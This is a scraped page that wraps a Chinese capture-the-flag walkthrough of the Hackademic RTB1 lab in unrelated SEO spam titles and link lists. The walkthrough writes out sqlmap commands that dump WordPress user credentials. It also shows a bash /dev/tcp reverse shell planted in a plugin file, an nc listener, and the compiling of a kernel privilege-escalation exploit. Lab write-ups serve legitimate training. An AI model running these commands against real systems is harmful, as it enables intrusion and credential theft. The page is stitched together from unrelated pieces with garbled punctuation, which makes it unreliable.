当前位置: 首页 > news >正文

北京网站建设公司现状网页制作模板水果

北京网站建设公司现状,网页制作模板水果,深圳网站程序开发制作,视觉设计网系列#xff1a;Hackademic#xff08;此系列共2台#xff09; 难度#xff1a;初级 信息收集 主机发现 netdiscover -r 192.168.80.0/24端口扫描 nmap -A -p- 192.168.80.143访问80端口 使用指纹识别插件查看是WordPress 根据首页显示的内容#xff0c;点击target 点击… 系列Hackademic此系列共2台 难度初级 信息收集 主机发现 netdiscover -r 192.168.80.0/24端口扫描 nmap -A -p- 192.168.80.143访问80端口 使用指纹识别插件查看是WordPress 根据首页显示的内容点击target 点击 页面能点击的链接发现点击Uncategorized的时候链接变成了 http://192.168.80.143/Hackademic_RTB1/?cat1尝试有无SQL注入在?cat1后加上发现有SQL语句的报错信息可以判断有SQL注入漏洞 目录扫描 单纯的爆破IP地址扫描不出有用的目录信息 dirsearch -u http://192.168.80.143 -i 200 开始是直接扫了IP现在多了一个目录/Hackademic_RTB1/那么直接扫该目录 dirsearch -u http://192.168.80.143/Hackademic_RTB1/ -i 200漏洞利用 sqlmap 查看都有哪些数据库 sqlmap -u 192.168.80.143/Hackademic_RTB1/?cat1 --dbs --batch 获取所有表 sqlmap -u 192.168.80.143/Hackademic_RTB1/?cat1 -D wordpress --tables --batch获取该表的所有字段 sqlmap -u 192.168.80.143/Hackademic_RTB1/?cat1 -D wordpress -T wp_users --columns --batch 获取想要的数据 sqlmap -u 192.168.80.143/Hackademic_RTB1/?cat1 -D wordpress -T wp_users -C user_login,user_pass --dump登录后台192.168.80.143/Hackademic_RTB1/wp-admin/ 使用一个用户密码登录 NickJames密码admin 登上 之后没有什么能够 利用的尝试换一个用户登录看看 用户:GeorgeMiller密码q1w2e3发现在Plugins选项里有一个Plugin Editor编辑的地址加入反弹shell system(bash -c sh -i /dev/tcp/192.168.80.132/8989 01);kali开启监听 nc -lvvp 8989提交之后就得要知道上文的 路径找出路径才能触发反弹shell 找到提交路径方式一 wordpress上传的文件默认是存储在目录/wp-content/uploads中Uploads文件夹中包括所有你上传的图片视频和附件。 WordPress文件夹内你会发现大量的代码文件和3个文件夹**wp-admin wp-content wp-includes** wp-admin 没错这是你的仪表板你登陆wordpress后看到的界面包括所有的后台文件 wp-content包含你所有的内容包括插件 主题和您上传的内容 Plugins文件夹包含所有插件。 每个插件都有一个自己的文件夹。 如Aksimet坐在Akismet在文件夹内 同样theme主题文件夹保存你所有的主题。 插件一样每个主题有单独的文件夹。 Uploads文件夹所有你上传图片视频和附件。 languages是关于语言的 wp-includes包括持有的所有文件和库是必要的WordPress管理编辑和JavaScript库CSS和图像fiels 在爆破目录的时候发现有一个wp-content目录可以访问一下看看 页面显示如下 http://192.168.80.143/Hackademic_RTB1/wp-content/ 刚在又是在Plugins选项里的Plugin Editor编辑的反弹shell刚在Plugin Editor编辑页面也显示了说正在编辑hello.php 所以在http://192.168.80.143/Hackademic_RTB1/wp-content/页面中点击plugins 就看到了hello.php点击hello.php触发反弹shell 耐心等待----------------- 内核提权 查看内核版本 uname -a新开一个终端搜索该版本的漏洞 searchsploit 2.6.3 | grep Local Privilege Escalation查看完整路径 searchsploit -p linux/local/15285.c 把这个15285.c复制到apache服务的根路径/var/www/html下 sudo cp /usr/share/exploitdb/exploits/linux/local/15285.c /var/www/html/15285.c启动apache服务 systemctl restart apache2.servicegcc 15285.c -o exp# 将15285.c预处理、汇编、编译并链接形成可执行文件exp#-o选项用来指定输出文件的文件名将15285.c预处理、汇编、编译并链接形成可执行文件exp。 -o选项用来指定输出文件的文件名 闯关成功
http://www.zqtcl.cn/news/427585/

相关文章:

  • 网站建设排名的公司江东seo做关键词优化
  • 学习网站开发培训网站内链是什么
  • 中文 域名的网站用wordpress做的网站有哪些
  • 网站建设中需要注意的问题唐山自助建站模板
  • 网站建设捌金手指下拉一重庆 网站定制
  • 网站建设需求调研方法自己做网站要多少钱
  • 北流网站建设公众号开发 表格
  • 做教育类网站一般流程苏宁易购网站风格
  • 兼职网站推广如何做如何用ps做网站
  • 济南外贸网站建设软件公司网站
  • 衡阳做网站注册网站流程
  • 关于网站建设的申请报告wordpress花园网站
  • jsp网站 iis免费企业信息查询
  • 泊头市网站建设公司只有企业自己建立网站平台进行
  • 有阿里云服务器 怎么做网站找广告设计
  • 网站建设 ui设计公司素材网站源码
  • 网站响应式布局wordpress代码混乱
  • 免费建设个人网站四川建设人员信息查询
  • 做国际网站有哪些专门做拼花网站
  • eclipse sdk做网站小程序开发报价明细
  • 网站开发源码售卖合同百度广告投诉电话
  • wordpress读法鄂州seo
  • 网站建设方案的写作方法媒体发稿推广
  • 免费的网站空间注册空壳公司判几年
  • 网站怎么运营推广达美网站建设
  • 江苏建设人才网网站中国最新时事新闻
  • 网站建立时间毕节地seo
  • 央企网站建设意义长沙网约车
  • 广告联盟怎么建设网站做贸易 公司网站放哪里
  • 北京建设局网站首页开发游戏用什么软件